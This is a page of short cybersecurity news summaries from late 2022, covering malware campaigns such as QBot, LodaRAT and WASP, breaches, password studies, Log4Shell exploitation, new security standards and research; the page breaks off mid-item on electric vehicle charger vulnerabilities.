News Items

  • news

    Visible to the public "PCI SSC Publishes New Standard for Mobile Payment Acceptance Solutions"

    The PCI Security Standards Council (PCI SSC) has released a new standard to help in the evolution of mobile payment acceptance solutions. PCI Mobile Payments on COTS (MPoC) expands on the existing PCI Software-based PIN Entry on COTS (SPoC) and PCI Contactless Payments on COTS (CPoC) standards, which address security requirements for merchants accepting cardholder PINs or contactless payments using a smartphone or other commercial off-the-shelf (COTS) mobile device. The PCI MPoC standard aims to increase flexibility in payment acceptance and in the development, deployment, and maintenance of COTS-based payment acceptance solutions. PCI MPoC is a new, adaptable mobile standard and program for the development of payment solutions. It provides a modular, objective-based security standard that supports various payment acceptance channels and consumer verification methods on COTS devices. The new standard combines many of the existing PCI SPoC and PCI CPoC standards, most notably the ability to enter both PIN and contactless cardholder data on the same COTS device. It will be of interest to vendors of card payment acceptance technologies and solutions because it may provide new types of solutions for them to address in their markets. Similarly, entities that deploy or use terminals may be interested in seeing what controls are put in place to secure the technologies that they may use next year and in the future. This article continues to discuss the new PCI MPoC standard.

    Help Net Security reports "PCI SSC Publishes New Standard for Mobile Payment Acceptance Solutions"

  • news

    Visible to the public "Elastic Report: Nearly 33% Of Cyberattacks in the Cloud Leverage Credential Access"

    According to the 2022 Elastic Global Threat Report, almost 33 percent of cloud attacks use credential access, suggesting that users often overestimate the security of their cloud environments and, as a result, fail to configure and protect them adequately. The report's key findings center on three primary trends: human error's role in increasing cloud security risks, malicious use of commercial software, and endpoint attacks becoming more diverse due to the high efficacy of most endpoint security software. While commercial adversary simulation software like CobaltStrike benefits many teams' environment defense, it is also being used as a malicious tool for mass-malware implants. Windows endpoints accounted for 54 percent of all malware infections, while 39 percent occurred on Linux endpoints. Meterpreter contributed the most Linux-based malware/payloads (14 percent), followed by Gafgyt (12 percent) and Mirai (10 percent). With 35 percent of all detections, CobaltStrike was the most common malicious binary or payload for Windows endpoints, followed by AgentTesla at 25 percent and RedLineStealer at 10 percent. In addition, threat actors are using more than 50 endpoint infiltration methods, indicating that endpoint security is effective, as its sophistication requires threat actors to constantly find new ways to make their attacks successful. This article continues to discuss key findings from the 2022 Elastic Global Threat Report.

    VB reports "Elastic Report: Nearly 33% Of Cyberattacks in the Cloud Leverage Credential Access"

  • news

    Visible to the public "Phishing Kit Impersonates Well-Known Brands to Target US Shoppers"

    Since mid-September, a sophisticated phishing kit has been targeting North Americans with lures themed around holidays such as Labor Day and Halloween. The kit employs a variety of evasion detection techniques as well as several mechanisms to keep non-victims away from its phishing pages. According to Akamai security researchers who discovered the campaign, one of the most intriguing features of the kit is a token-based system that ensures each victim is redirected to a unique phishing page URL. The campaign began in September 2022 and ran through October 2022, preying on online shoppers. The main theme of the phishing emails sent to potential victims is the opportunity to win a prize from a reputable brand. The links in the email raise no red flags because they lead to the phishing site after a series of redirections, and URL shorteners hide most URLs. Furthermore, the attackers take advantage of legitimate cloud services such as Google, AWS, and Azure, using their good reputation to circumvent security measures. After completing a short survey, everyone who visits the phishing site receives the promised prize. In addition, a five-minute timer instills a sense of urgency in those taking the survey. DICK'S Sporting Goods, Delta Airlines, Sam's Club, Costco, and more are among the impersonated brands. The phishing actors also included fake user testimonials showcasing the received prizes to increase the campaign's effectiveness. This article continues to discuss the phishing kit targeting North American online shoppers.

    Bleeping Computer reports "Phishing Kit Impersonates Well-Known Brands to Target US Shoppers"

  • news

    Visible to the public "LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities"

    LodaRAT malware has resurfaced with new variants being used in tandem with other sophisticated malware, such as RedLine Stealer and Neshta. According to Cisco Talos researcher Chris Neal, the ease of access to LodaRAT's source code makes it an appealing tool for any threat actor interested in its capabilities. LodaRAT has been observed being delivered via a previously unknown variant of another commodity Trojan called Venom RAT, codenamed S500, in addition to being dropped alongside other malware families. LodaRAT is an AutoIT-based malware associated with the Kasablanca group and can harvest sensitive information from compromised machines. In February 2021, an Android version of the malware appeared, allowing threat actors to broaden their attack surface. Then, in September 2022, Zscaler ThreatLabz discovered a new delivery mechanism involving the use of Prynt Stealer, an information stealer. According to Cisco Talos' latest findings, altered variants of LodaRAT have been detected in the wild with updated functionality, allowing it to spread to every attached removable storage device and detect running antivirus processes. The revamped implementation is also deemed ineffective because it searches for an explicit list of 30 different process names associated with various cybersecurity vendors, implying that a solution that does not meet the search criteria will be missed. This article continues to discuss the resurfacing of the LodaRAT malware with new variants.

    THN reports "LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities"

  • news

    Visible to the public "Study Uncovers New Threat to Security and Privacy of Bluetooth Devices"

    Bluetooth-enabled mobile devices have been found to be vulnerable to a flaw that could allow attackers to track a user's location. The study centers on Bluetooth Low Energy (BLE), a type of Bluetooth that uses less energy than Bluetooth Classic, an earlier generation of Bluetooth. Billions of people rely on this type of wireless communication on smartwatches and smartphones for various activities such as entertainment, sports, retail, and healthcare. However, due to a design flaw in Bluetooth's protocol, users' privacy may be jeopardized, according to Yue Zhang, the study's lead author and a postdoctoral researcher in computer science and engineering at the Ohio State University (OSU). Zhang and his advisor, Zhiqiang Lin, an Ohio State professor of computer science and engineering, demonstrated the threat by testing more than 50 commercially available Bluetooth devices as well as four BLE development boards. They informed major Bluetooth industry stakeholders, including the Bluetooth Special Interest Group (SIG), hardware vendors like Texas Instruments and Nordic, and operating system providers such as Google, Apple, and Microsoft, about the flaw. Google classified their discovery as a high-severity design flaw and awarded the researchers a bug bounty. Zhang and Lin also created a potential solution to the problem, which they tested successfully. Bluetooth devices have Media Access Control (MAC) addresses, a series of random numbers uniquely identifying them on a network. An idle BLE device sends out a signal every 20 milliseconds advertising its MAC address to other nearby devices with which it could connect. The study identifies a flaw that could allow attackers to observe how these devices interact with the network and then collect and analyze data to violate a user's privacy, either passively or actively. One of the reasons researchers are concerned about such a scenario is that a captured MAC address could be used in a replay attack, enabling the attacker to monitor the user's behaviors, track where the user has been in the past, or even determine the user's current location. The researchers' solution, called Securing Address for BLE (SABLE), entails adding an unpredictable sequence number or a timestamp, to the randomized address to ensure that each MAC address can only be used once, thereby preventing the replay attack. It was successful in preventing attackers from connecting to the victim's devices. This article continues to discuss the new threat to the security and privacy of Bluetooth devices as well as the countermeasure developed to address it.

    OSU reports "Study Uncovers New Threat to Security and Privacy of Bluetooth Devices"

  • news

    Visible to the public "QBot Phishing Abuses Windows Control Panel EXE to Infect Devices"

    Phishing emails distributing the QBot malware are infecting computers by exploiting a Dynamic-Link Library (DLL) hijacking flaw in the Windows 10 Control Panel, most likely to avoid detection by security software. DLL hijacking is a common attack technique that exploits the way DLLs are loaded in Windows. When a Windows executable is launched, it searches the Windows search path for any DLL dependencies. However, if a threat actor creates a malicious DLL with the same name as one of the program's required DLLs and places it in the same folder as the executable, the program will load that malicious DLL instead of the required DLL, infecting the computer. QBot, also known as Qakbot, is a Windows malware that began as a banking Trojan but has since evolved into a full-fledged malware dropper. The malware is also used by ransomware gangs such as Black Basta, Egregor, and Prolock to gain initial access to corporate networks. In July, a security researcher discovered that threat actors were installing the QBot malware by exploiting a DLL hijacking vulnerability in the Windows 7 Calculator. According to the security researcher ProxyLife, attackers have switched to exploiting a DLL hijacking flaw in the Windows 10 Control Panel executable. Since QBot is installed through a trusted program, such as the Windows 10 Control Panel, security software may not flag the malware as malicious, thus allowing it to avoid detection. QBot will now run in the background, quietly stealing emails for use in phishing attacks and downloading additional payloads like Brute Ratel or Cobalt Strike. Threat actors use Brute Ratel and Cobalt Strike post-exploitation toolkits to gain remote access to corporate networks. This remote access is typically used to steal corporate data and launch ransomware attacks. This article continues to discuss phishing emails distributing the QBot malware that use a DLL hijacking flaw in the Windows 10 Control Panel to infect computers.

    Bleeping Computer reports "QBot Phishing Abuses Windows Control Panel EXE to Infect Devices"

  • news

    Visible to the public "As SaaS App Usage Soars, Consolidation and Security Concerns Drive Change"

    BetterCloud, a cloud service management company, discovered that organizations are increasingly using Software-as-a-Service (SaaS) apps, but the industry is changing due to consolidation and app security concerns. The company's 10th annual State of SaaSOps report, based on a survey of 742 Information Technology (IT) and security professionals, looked into the growing adoption of SaaS, the most pressing challenges confronting IT operations today, and why SaaS security keeps IT staff awake at night. In the last year, 43 percent of those surveyed said they had added a new SaaS app that stores sensitive data, and 81 percent said they are responsible for protecting this sensitive data. The implementation of new SaaS apps was balanced by those that were canceled, with 40 percent reporting that they had retired duplicate and overlapping applications in the last 12 months. The net growth of SaaS apps was 18 percent year-over-year, with organizations now using an average of 130 apps. According to 59 percent of those surveyed, SaaS sprawl is causing management headaches, and SaaS proliferation is difficult to manage. One of the major issues is "shadow" SaaS apps, which are considered a problem by 65 percent of respondents. However, 57 percent reported that their teams' support for the number of SaaS apps they manage has increased in the last year. Eighty percent of respondents cited employee experience as a driving force behind SaaS adoption and changes. Employee experience was also cited as a key motivator for initiatives to automate workflows by those surveyed. Eighty-six percent of respondents emphasized that automation is critical to overcoming today's SaaSOps challenges. Seventy-one percent have automated at least one help desk process, such as onboarding or password resets, and 43 percent have a dedicated SaaSOps automation role or team, with another 23 percent planning to do so. This article continues to discuss key findings from BetterCloud's latest State of SaaSOps report.

    SiliconANGLE reports "As SaaS App Usage Soars, Consolidation and Security Concerns Drive Change"

  • news

    Visible to the public "Meta Reportedly Disciplined or Fired More Than Two Dozen Workers For Taking Over Facebook User Accounts"

    Meta Platforms reportedly recently fired or disciplined more than two dozen employees and contractors who allegedly compromised and took control of Facebook user accounts. Bribery was involved in some cases. Users who were locked out of their Facebook accounts often weren't able to regain access through traditional means, such as reaching out to Facebook directly. So, some users resorted to seeking outside sources who have contacts within Meta who were willing to unlock accounts for them. In some cases, workers accepted thousands of dollars in bribes from hackers to compromise or access user accounts. The terminations or discipline came about as a result of an internal investigation. Meta communications director Andy Stone stated that individuals selling fraudulent services are always targeting online platforms, including ours, and adapting their tactics in response to the detection methods that are commonly used across the industry. Some of the fired workers were employed as Allied Universal contractors providing security for Meta facilities, who were given access to internal employee tools to assist company employees.

    CNBC reports: "Meta Reportedly Disciplined or Fired More Than Two Dozen Workers For Taking Over Facebook User Accounts"

  • news

    Visible to the public "Detecting and Defending Against DLL Sideloading Attacks"

    Dynamic-Link Library (DLL) sideloading, also known as DLL hijacking, often gets overlooked. However, because of their widespread nature and ease of exploit development, these flaws are valuable for digital adversaries. Many Windows services are currently vulnerable to these attacks. The FBI, the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber Command Cyber National Mission Force, the National Security Agency (NSA), and the UK's National Cyber Security Center detected a DLL file renamed as a legitimate filename to enable the DLL sideloading technique in a detailed analysis of 23 files identified as MuddyWater tools. In a DLL sideloading attack, the threat actor places a malicious DLL file in the same directory as a trusted EXE. If the EXE tries to load a DLL with the same name, the attacker's DLL is loaded instead. In many cases, an attacker does not need to know which methods the EXE plans to call in the DLL because it is possible to create a DLL that runs code immediately as it is loaded. This is by design, putting any user account at risk of compromise. It is worth noting that this is a particularly serious issue with Windows services because service configurations allow attackers to quickly force the issue by simply adding a malicious DLL and then restarting the service, possibly with a simple reboot. The required level of sophistication is low, and a single DLL sideloading exploit kit can be used against almost any software with unsafe permissions in the installation folder. This article continues to discuss DLL sideloading attacks and how to stay ahead of them.

    Security Boulevard reports "Detecting and Defending Against DLL Sideloading Attacks"

  • news

    Visible to the public "Zeus Botnet Suspected Leader Arrested in Geneva"

    Swiss authorities have recently arrested a Ukrainian national wanted by the Federal Bureau of Investigation (FBI) for 12 years for connections with a cyber-criminal group that stole millions of dollars from bank accounts using malware called Zeus. Vyacheslav Igorevich Penchukov was arrested in Geneva on October 23, 2022, and is now pending extradition to the US. Penchukov was first named in a 2012 indictment by the US Department of Justice, alongside Ivan Viktorvich Klepikov and Alexey Dmitrievich Bron, as one of the leaders in the JabberZeus Crew, a small cyber-criminal gang from Ukraine and Russia that attacked victims with a customized version of the Zeus banking Trojan. The indictment says the Zeus malware captured passwords, account numbers, and other information necessary to log into online banking accounts. The conspirators allegedly used the information captured by Zeus to steal millions of dollars from victims' bank accounts. In November 2014, two additional members of JabberZeus, Yevhen Kulibaba, and Yuriy Konovalenko pleaded guilty after being arrested and deported from the UK. They were sentenced to two years and 10 months of incarceration a year later. All participants in the gang were accused of conspiracy to commit computer fraud and identity theft, conspiracy to participate in racketeering activity, aggravated identity theft, and several counts of bank fraud. JabberZeus gang mainly targeted small and mid-sized businesses, and its members were pioneers of the so-called "man-in-the-browser" attacks. After accessing victims' bank accounts, the hackers would modify the firm's payroll to include dozens of "money mules" who would handle bank transfers and forward any stolen payroll deposits overseas. According to a Wired report from 2017, the original version of the Zeus banking Trojan was allegedly created by an anonymous individual known by the handle "lucky12345." The Zeus criminal group has now been reportedly dismantled, but years later, banking Trojans remain a pressing issue in the cybersecurity community.

    Infosecurity reports: "Zeus Botnet Suspected Leader Arrested in Geneva"

  • news

    Visible to the public "Persistent Cybersecurity Threats Impede HHS Strategic Plans, Watchdog Warns"

    According to a new report from the Office of the Inspector General (OIG), as the Department of Health and Human Services (HHS) strives for greater interoperability across the healthcare sector, the agency must increase efforts to modernize its approach to cybersecurity. The report, "Top Management and Performance Challenges Facing HHS," outlines the healthcare regulator's complex challenges, with a section dedicated to cybersecurity concerns. OIG discovered that HHS had made efforts to improve its posture, particularly following the Biden administration's executive order in May 2021 directing federal agencies to fundamentally and systemically change their approach to cybersecurity. HHS is finalizing its strategic plan, but the road ahead has challenges shared by the government and healthcare sectors, including persistent cybersecurity threats. According to the report, significant investments in resources, as well as cultural and organizational change, will be required. HHS has long struggled to meet the challenges confronting its information security program, with yearly reports from both the OIG and the Government Accountability Office (GAO) consistently deeming the program ineffective, under the Federal Information Security Modernization Act (FISMA) metrics. The most recent OIG audit, released in April, discovered that HHS failed to meet the "managed and measurable" maturity level for all five elements of the identifying, protecting, detecting, and recovering function elements required by Department of Homeland Security (DHS) guidance and FISMA. HHS is working to address these vulnerabilities to meet the executive order's requirements for federal agencies on specific cybersecurity standards and objectives by the end of fiscal year 2024, which includes adopting a zero-trust security architecture approach. This article continues to discuss HHS cybersecurity challenges.

    SC Media reports "Persistent Cybersecurity Threats Impede HHS Strategic Plans, Watchdog Warns"

  • news

    Visible to the public "Security Budget Cuts and Recession Spark Worries Among IT Admins"

    According to researchers at JumpCloud, IT professionals worry that cybersecurity-specific funding might be at risk. Of those surveyed, 44% agree their organization will cut spending on cybersecurity in the next year. Many of the respondents (75%) said cuts to their organization's security budget would increase organizational risk, and 58% said they were more concerned about their organization's security posture than they were six months ago. The researchers noted that factors behind the cuts to cybersecurity funding include inflation, labor shortages, recession talks, market volatility, and global conflicts. The researchers stated that some of these factors are, in turn, also causing licensing costs to increase, with 22% of respondents expecting to spend 50% or more of their budget on licensing in the coming year, up from 17% in April 2022. Many participants (78%) reported seeing evidence of a recession in their business. Among them, 34% said business had been severely impacted. For 34% of those surveyed, labor shortages significantly impact business or are a severe business limiter.

    Infosecurity reports: "Security Budget Cuts and Recession Spark Worries Among IT Admins"

  • news

    Visible to the public "Revealed: The Top 200 Most Common Passwords of 2022"

    Despite their insecurity, sequential strings of numbers and "password" remain users' most popular password choices worldwide. NordPass' annual study of the top 200 most popular passwords also revealed that in the UK, names of football teams ranked highly among the most-used passwords of the year. For example, the password "liverpool" was the fourth most popular of the year, while "arsenal," "chelsea," and "liverpool1" were all in the top 15. Regional results, such as those from France, revealed similarly insecure password practices, but the actual passwords differed. For example, the third most popular password in the country was "azerty," the equivalent of "qwert" on a French keyboard layout. NordPass also included data sets organized by user gender, which revealed some significant differences in password frequency. In the US, the most popular password among women was "guest," while "12345" was the most popular among men. The most secure password in the top 200 was "9136668099," which is estimated to take hackers four days to crack. However, it is still not a secure password because it contains no letters or special characters. Regularly updating one's password is good security practice, and experts advise against using easy-to-guess words or phrases, or anything that a threat actor could easily link to an individual. Hackers employ various password-cracking techniques, but brute-force attacks, in which hackers guess a victim's password through different forms of trial and error, are common. Hackers can use powerful hardware such as Graphics Processing Units (GPUs) to speed up password cracking, but the most basic brute-force attacks involve trying common passwords until access is granted, which is reason enough for users to avoid using anything that resembles a password in the top 200. This article continues to discuss findings from NordPass' report on the top 200 most common passwords.

    ITPro reports "Revealed: The Top 200 Most Common Passwords of 2022"

  • news

    Visible to the public "Data Breach at Arkansas Department of Human Services Releases Medicaid Information"

    Officials with the Arkansas Department of Human Services have recently discovered a data breach that released client data. The officials said the breach came on Sept. 16 when an employee sent emails from her DHS email account to her personal Yahoo email account. The emails had attachments of spreadsheets that listed 925 DHS Medicaid clients who had been diagnosed with the flu. The officials noted that listed in the attachments were the person's Medicaid ID, date of birth, gender, county, zip code, and diagnosis. Names, Social Security numbers, full addresses, and financial information were not disclosed in the breach. Department officials said they had notified the affected clients by mail about the breach. It was noted that the staff is trained on security, including patient privacy. Part of the training employees receive includes using secure and encrypted email and not using personal email for client health information. Officials said the department is taking steps to prevent a data breach like this from taking place in the future.

    MSN reports: "Data Breach at Arkansas Department of Human Services Releases Medicaid Information"

  • news

    Visible to the public "More Than Half of Black Friday Spam Emails Are Scams"

    According to new research by Bitdefender, over half (56%) of Black Friday spam emails received between October 26 and November 6, 2022, were scams. The researchers analyzed all unsolicited Black Friday-related emails delivered to its customers over the period, with the vast majority (68%) sent on the final three days (November 4, 5, and 6). Unsurprisingly, the highest proportion of Black Friday spam messages were received in the US (27%). This was closely followed by Ireland (24%), then Sweden (8%), Denmark (7%), and France (5%). The researchers found that scammers placed a heavy emphasis on using fake discount offers on designer bags and sunglasses to lure consumers to fake shops to steal their money and data. Another significant avenue pursued by fraudsters was "giveaway scams." The researchers stated that, similar to 2021, spammers were keen on exploiting internet users' attraction to freebies and giveaways.

    Infosecurity reports: "More Than Half of Black Friday Spam Emails Are Scams"

  • news

    Visible to the public  "Q&A: UW Researchers Find Privacy Risks With 3D Tours on Real Estate Websites"

    Virtual 3D tours on real estate websites like Zillow and Redfin enable viewers to explore homes without travel. The homes in these tours are sometimes staged, but they also contain evidence of current residents' lives. Researchers at the University of Washington (UW) were interested in whether personal belongings visible in 3D tours could pose privacy and security risks. They looked at 44 3D tours on a real estate website, each of which was for a home in a different state, and included at least one personal detail, such as a letter, a college diploma, or a photo. According to the researchers, the details left in these tours could expose residents to various threats, such as phishing attacks or credit card fraud. The researchers' findings were published on November 8 and will be presented at the USENIX Security Symposium 2023. According to lead author Rachel McAmis, a UW doctoral student in the Paul G. Allen School of Computer Science & Engineering, the team discovered traditionally sensitive information that people should never share with strangers, as well as information that reveals people's behavior and preferences. The majority of 3D tours in the study revealed the full names of residents. There were 3D tours that included labeled medication, passwords, credit card information, and a letter indicating a legal violation. Viewers of 3D tours can also see people's behaviors and preferences, such as the products and brands they buy, their political affiliation, how clean their house is, how many family members live together, their religion, and whether or not they own a pet. Such information revealed in the 3D tours could be used by malicious actors to target a resident with a personalized message. For example, a malicious actor can send a phishing message pretending to be an email from a brand from which the resident frequently purchases. This article continues to discuss the study on potential security and privacy issues that emerge when personal details are included in virtual 3D tours on real estate websites.

    UW News reports "Q&A: UW Researchers Find Privacy Risks With 3D Tours on Real Estate Websites"

  • news

    Visible to the public "Better Governance Is Crucial to Getting Value From Data"

    Data is one of the most valuable resources for businesses, but extracting that value requires effective content management. According to a new Rocket Software survey of more than 500 corporate Information Technology (IT) professionals from various industries in the US, UK, and APAC regions, business data is still vastly unstructured, with 81 percent indicating that at least some of their data is considered 'dark.' Security rises to the top of organizations' concerns once they begin managing their data, but respondents note additional features that would greatly enhance content management, such as the ability to apply automation and rules-based redaction (full or partial) to protect sensitive data (62 percent), the ability to manage content types regardless of size or origin (61 percent), and having a single view of content from across multiple, disparate repositories (60 percent). According to 81 percent of respondents from larger organizations with 1,000-4,999 employees, automating their organization's current information security and compliance processes would give them a competitive advantage. This article continues to discuss key findings from Rocket Software's survey.

    BetaNews reports "Better Governance Is Crucial to Getting Value From Data"

  • news

    Visible to the public "Chinese Spy Gets 20 Years for Aviation Espionage Plot"

    A prolific Chinese spy who tried to steal secrets from US aviation companies has recently been jailed for 20 years. According to the Department of Justice (DoJ), Yanjun Xu, 42, rose to become deputy division director at the Ministry of State Security (MSS) intelligence agency. However, he was arrested in Belgium in 2018 after being lured there by an FBI agent posing as a GE Aviation employee that Xu was cultivating to provide Beijing with information. Xu was the first ever Chinese intelligence officer to be extradited to the US, according to the DoJ. The DoJ noted that the spy reportedly played a key role in a sophisticated, multi-year plot to steal trade secrets from western aerospace firms that helped the country build its C919 commercial airliner, among other things. Xu used aliases, front companies, and universities to trick aviation employees and solicit information, sometimes recruiting them to travel to China under the guise of giving a presentation at a university, which they were paid for. The DoJ noted that he also worked with colleagues to hack the computers of GE Aviation employees in their hotel rooms while other MSS officials took the staffers out to dinner. Xu also recruited insiders at a French aircraft engine manufacturer's plant in China who were willing to spy for Beijing and planted malware on the laptop of a French executive who frequently traveled to the facility. Xu also directed Chaoqun Ji, who entered the US on an F-1 student visa, to recruit individuals in the US. In 2016 Ji was allowed to join the US army and apparently stated his plan was to obtain a top security clearance. He was convicted in 2022. FBI director Christopher Wray said this case is the latest example of the Chinese government's continued attacks on American economic and national security. A federal jury in Cincinnati convicted Xu on all counts: conspiracy to commit economic espionage, conspiracy to commit trade secret theft, attempted economic espionage, and attempted trade secret theft.

    Infosecurity reports: "Chinese Spy Gets 20 Years for Aviation Espionage Plot"

  • news

    Visible to the public "Misconfigured Server Exposed PHI of 600,000 Inmates"

    A server misconfiguration at a company that processes medical claims for correctional facilities exposed sensitive information on nearly 600,000 inmates. CorrectCare Integrated Health Inc. of Kentucky reported to the US Department of Health and Human Services (HHS) on October 31 at least three "unauthorized access/disclosure" breaches involving its server misconfiguration incident that affected nearly 500,000 people. The HHS Office for Civil Rights' HIPAA Breach Reporting Tool website also lists several breaches reported by CorrectCare's clients in recent weeks, affecting an additional 100,000 people. Clients include the Louisiana Department of Public Safety and Corrections, Sacramento County Adult Correctional Health, and Mediko Correctional Healthcare, a company that provides medical and mental health services to inmates in correctional facilities. Two file directories on a CorrectCare web server had been exposed to the Internet, according to a notification letter. According to CorrectCare, the file directories contained Protected Health Information (PHI) of individuals who were incarcerated in the state prison. The exposed file directories contained patient information such as full names, dates of birth, Social Security numbers, and limited health information such as diagnosis codes and procedure codes. CorrectCare says no driver's license numbers, financial accounts, or payment cards were compromised. This article continues to discuss the exposure of PHI on 600,000 inmates due to a server misconfiguration.

    InfoRiskToday reports "Misconfigured Server Exposed PHI of 600,000 Inmates"

  • news

    Visible to the public "FDA, MITRE Publish Updated Medical Device Security Incident Response Playbook"

    The US Food and Drug Administration (FDA) and MITRE have published an updated version of their "Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook," which provides actionable strategies and resources for healthcare organizations to respond to cyber incidents while ensuring medical device security. Since the playbook's first iteration in 2018, cyberattacks have continued to have a significant impact on the healthcare sector. Medical device security is still a top priority for healthcare organizations, and keeping those devices operational during a cyber incident is critical. The updated playbook includes a resource appendix to help healthcare organizations navigate the playbook's contents and identify key resources. Furthermore, the playbook emphasizes the importance of having a diverse team participate in incident response exercises, ranging from clinicians to Information Technology (IT) staff. The FDA and MITRE also aimed to improve the playbook's alignment with the Hospital Incident Command System (HICS) for dealing with complex incidents. The updated version also includes a "Playbook Quick Start Companion Guide" to help organizations in orienting themselves and identifying key priority areas. The playbook emphasized the importance of regional partner collaboration and trust, as well as creating a medical device asset inventory and conducting a Hazard Vulnerability Analysis (HVA). With healthcare-related cyber incidents growing in size and scope, having a strong, well-executed support infrastructure in place prior to a cyber event is critical to executing a rapid, comprehensive, and robust response. This article continues to discuss the updated version of the Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook.

    HealthITSecurity reports "FDA, MITRE Publish Updated Medical Device Security Incident Response Playbook"

  • news

    Visible to the public  "WASP Malware Stings Python Developers"

    WASP malware uses steganography and polymorphism to avoid detection, with malicious Python packages designed to steal credentials, personal information, and cryptocurrency. Earlier this month, researchers from Phylum and Check Point reported finding new malicious packages on the Python Package Index (PyPI). Checkmarx analysts linked the same attacker to both reports and said the operator is still releasing malicious packages. A Checkmarx report detailed hundreds of successful infections of the WASP information-stealer malware, discovering a number of features to ensure persistence in a compromised PC and evade cybersecurity tools. The operator is selling copies of WASP to other criminals for $20 in cryptocurrency or gift cards. PyPI is becoming a more popular target in software supply chain attacks for uploading malicious code via fake packages. Typosquatting is a technique in which malicious packages are given names that sound legitimate or are similar to real packages. As a result, developers are duped into installing booby-trapped packages that appear to be useful and legitimate. Check Point noted that such packages typically include malicious code to download and run a virus, carrier code for sneaking the malicious code in, and luring victims to install the malicious package, such as through typosquatting. In August, the PyPI community issued a warning about the first-ever phishing attack against its users. If a developer installs the malicious package on their system, it becomes an initial infection point for other malware, in this case, the WASP information-stealing Trojan. This article continues to discuss the WASP information-stealing malware impacting the software supply chain.

    The Register reports "WASP Malware Stings Python Developers"

  • news

    Visible to the public "Top Passwords Used in RDP Brute-Force Attacks"

    Specops Software published a study that examined the most common passwords used in live attacks against Remote Desktop Protocol (RDP) ports. This analysis coincides with the addition of more than 34 million compromised passwords to the Specops Breached Password Protection Service, which now contains over 3 billion unique compromised passwords. RDP over Transmission Control Protocol (TCP) Port 3389 is a popular method for Information Technology (IT) teams to provide remote network access to remote workers. Although attacks on RDP ports increased during the COVID-19 pandemic due to the rise of remote work, the port has remained a popular attack method for criminals. Password-related attacks continue to top the attack methods list, with recent research revealing that brute-force password guessing accounts for 41 percent of all intrusion vectors. The most common base terms found in passwords used to attack TCP Port 3389 in an analysis of over 4.6 million passwords collected in October 2022 from Specops Software's honeypot system included: "Password," "p@ssw0rd," "Welcome," "admin," "Passw0rd," "p@ssword," "pa$$w0rd," "qwerty," "User," and "test." Furthermore, an examination of port attack data, including the RDP port and others, revealed several password patterns. More than 88 percent contain 12 characters or less, nearly 24 percent contain only 8 characters, and less than 19 percent contain only lowercase letters. This article continues to discuss key findings from the analysis of the top passwords used in live attacks against RDP ports.

    Help Net Security reports "Top Passwords Used in RDP Brute-Force Attacks"

  • news

    Visible to the public "MITRE Engenuity Launches Evaluations for Security Service Providers"

    MITRE Engenuity has released a new set of evaluations for Managed Security Service Providers (MSSPs), which could provide enterprise decision-makers with a useful resource to consult when choosing a provider. The key to gaining value from the information is understanding how to interpret the results, according to MITRE and others. The first-ever MITRE Engenuity evaluation of security service providers offers detailed information on how various MSSPs analyze and describe adversary behavior to their clients. MITRE's assessment leaves it entirely up to security professionals and teams who use the data to make vendor comparisons. MITRE Engenuity provided each participating vendor with the opportunity to deploy their adversary detection and monitoring tools on an MITRE-hosted Microsoft Azure environment for the evaluation. A MITRE purple team then carried out a simulated environmental attack using the tactics and techniques of the well-known Iranian threat group OilRig. Participants in the evaluation were aware that the simulated attack would take place during business hours over a two-week period. However, MITRE did not provide them with more specific timing, techniques, or which adversary MITRE Engenuity was emulating. MITRE Engenuity's team demonstrated commonly used adversary tactics such as spear-phishing for initial access, credential dumping, web shell installation, lateral movement, data exfiltration, and cleanup during the simulated attack. Vendors could use any of the tools in their MDR portfolio to evaluate and report on malicious activity. However, MITRE's rules prevented them from responding or blocking the attack because the goal was to see how each service provider detected and analyzed the unfolding attack, as well as the detail and clarity with which they reported their findings. This article continues to discuss MITRE Engenuity's ATT&CK Evaluations for Managed Services.

    Dark Reading reports "MITRE Engenuity Launches Evaluations for Security Service Providers"

  • news

    Visible to the public "Iranian Hackers Compromised a US Federal Agency's Network Using Log4Shell Exploit"

    Iranian government-sponsored threat actors have been linked to the compromise of a US federal agency, which involved exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server. The information was provided by the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA) in response to incident response efforts conducted by the agency from mid-June to mid-July 2022. Log4Shell, also known as CVE-2021-44228, is a critical Remote Code Execution (RCE) flaw in Apache Log4j, a popular Java-based logging library. The open-source project maintainers addressed it in December 2021. However, since the beginning of the year, Iranian state-sponsored groups have been exploiting Log4j vulnerabilities in VMware Horizon servers. CISA did not attribute the incident to a specific hacking group, but a joint advisory issued in September 2022 by Australia, Canada, the UK, and the US suspecting Iran's Islamic Revolutionary Guard Corps (IRGC) of exploiting the gap. According to CISA, the affected organization was breached as early as February 2022 by weaponizing the vulnerability to add a new exclusion rule to Windows Defender that allowedlisted the entire C: drive. As a result, the adversary was able to download a PowerShell script without triggering any antivirus scans, which allowed the adversary to retrieve the XMRig cryptocurrency mining software hosted on a remote server in the form of a ZIP archive file. This article continues to discuss the exploitation of Log4Shell vulnerability by Iranian government-sponsored threat actors to compromise a US federal agency.

    THN reports "Iranian Hackers Compromised a US Federal Agency's Network Using Log4Shell Exploit"

  • news

    Visible to the public "Sandia Studies Vulnerabilities of Electric Vehicle Charging Infrastructure"

    As electric vehicles become more prevalent, so do the risks and hazards of a cyberattack on electric vehicle charging equipment and systems. Jay Johnson, an electrical engineer at Sandia National Laboratories (SNL), has been researching the vulnerabilities of electric vehicle charging infrastructure. Johnson emphasized the importance of exploring electric vehicle charger vulnerabilities to make recommendations to policymakers and inform them of what security improvements are required by the industry. The Bipartisan Infrastructure Law includes $7.5 billion in funding for electric vehicle charging infrastructure. The federal government requires states to implement physical and cybersecurity strategies as part of this funding. The Sandia team's review will help states prioritize hardening requirements as well as help the federal government in standardizing best practices and mandating minimum security levels for electric vehicle chargers. Electric vehicle charging infrastructure is vulnerable to various threats, ranging from skimming credit card information at conventional gas pumps or ATMs to hijacking an entire network of electric vehicle chargers using cloud servers. The team explored entry points, such as vehicle-to-charger connections, wireless communications, electric vehicle operator interfaces, cloud services, and charger maintenance ports. They investigated standard AC chargers, DC fast chargers, and extreme fast chargers. The study discovered several flaws in each interface. For example, vehicle-to-charger communications could be intercepted, and charging sessions terminated from over 50 yards away. Electric vehicle owner interfaces were particularly vulnerable to data theft or changes in charger pricing. For protection, most electric vehicle chargers use firewalls to maintain separation from the Internet, but Argonne 